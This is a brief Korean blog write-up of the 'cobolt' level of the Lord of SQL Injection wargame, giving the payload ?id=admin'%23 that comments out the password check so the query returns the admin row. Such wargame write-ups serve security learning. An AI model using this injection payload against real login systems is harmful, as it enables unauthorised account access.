[Lord of SQL injection] cobolt

마흔 번째 글.

 

 

1. 코드 분석

다른 것들은 첫 문제와 똑같았다.

다만 id가 'admin'이 아니면 풀리지 않는다.

 

 

2. Exploit

?id=admin'%23

이렇게 보내주면 된다.

(첫 번째 문제와 마찬가지로 '#'인코딩 필수)

 

ㄲ